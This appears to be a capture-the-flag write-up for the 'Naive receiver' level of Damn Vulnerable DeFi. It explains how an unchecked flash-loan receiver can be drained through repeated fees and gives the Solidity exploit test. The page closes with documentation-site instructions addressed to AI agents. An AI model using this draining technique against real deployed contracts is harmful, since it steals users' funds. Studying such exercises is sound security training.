# 2. Naive receiver

#### **Objective**

There’s a pool with 1000 ETH in balance, offering flash loans. It has a fixed fee of 1 ETH.

A user has deployed a contract with 10 ETH in balance. It’s capable of interacting with the pool and receiving flash loans of ETH.

Take all ETH out of the user’s contract. If possible, in a single transaction.

#### **Approach**

* We want to drain `FlashLoanReceiver.sol` of its ETH. 
* It only has 2 functions, receiveEther() and receive()
* receiveEther() is called by flashLoan() function on `NaiveReceiverLenderPool`
  * checks that msg.sender is pool
* Notice that **anyone** can call flashLoan() function and **pass a borrower address of choice**
  * **receiveEther() does not check originator of transaction**
* This means we can repeatedly call flashLoan(), passing the `FlashLoanReceiver` address, draining the user's contract by repeatedly paying fees

#### Solution

The solution is to repeatedly call flashLoan() on naiveReceiverLenderPool, targetting flashLoanReceiver as the called of the flash loan.

We will achieve this with a `while` loop.

<figure><img src="/files/J8rAUBwCvKpaVm2UJIwW" alt=""><figcaption></figcaption></figure>

* calculate the remaining balance on the target contract, less the flash loan fee
* take a flashout out with said balance
* the user's balances are drained paying fees
* while loop breaks when user's balance is 0.

```solidity
    function testExploit() public {
        /**
         * EXPLOIT START *
         */
        uint256 fee = naiveReceiverLenderPool.fixedFee();

        vm.startPrank(attacker);
        while (true) {
            uint256 loanAmount = address(flashLoanReceiver).balance - fee;
            naiveReceiverLenderPool.flashLoan(address(flashLoanReceiver), loanAmount);

            // if no more ETH, break out of while loop
            if (address(flashLoanReceiver).balance == 0) break;
        }

        /**
         * EXPLOIT END *
         */
        validation();
        console.log(unicode"\n🎉 Congratulations, you can go to the next level! 🎉");
    }

```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://calnix.gitbook.io/eth-dev/smart-contract-security/damn-vulnerable-defi/2.-naive-receiver.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.